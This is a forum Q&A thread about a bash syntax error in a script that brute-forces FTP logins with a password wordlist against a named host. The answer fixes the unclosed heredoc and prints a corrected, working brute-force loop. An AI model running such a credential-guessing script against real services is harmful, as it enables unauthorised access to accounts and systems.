# Bash Script: Error, unexpected end of file

Tags: bash, shell, ubuntu, sh

I'm writing a short bash script which brute forces an ftp server using a password list. Here is my code:

```
#!/bin/bash
USER="user"
PASS=""
filename="WORDLIST"

cat $filename | while read LINE; do
    PASS=$LINE
    ftp -inv services.cyberprotection.agency 2121 << EOF
    user $USER $PASS
done
```

When I run my script, I get this error:

> syntax error: unexpected end of file

Can anyone suggest why I'm getting this error, thanks for any help.

Comment: You didn't close the heredoc

Comment: Whenever you have a shell script error, a good first step is to cut and paste your code into
[shellcheck.net](http://www.shellcheck.net/)
and correct the errors (important) and warnings (might be important) that it identifies. If you have trouble understanding its messages, then come here and ask.

Answer (score 2):

You need to finish the heredoc:

```
#!/bin/bash
USER="user"
PASS=""
filename="WORDLIST"

while read LINE; do
    PASS=$LINE
    ftp -inv services.cyberprotection.agency 2121 << EOF
    user $USER $PASS
EOF
done < "$filename"
```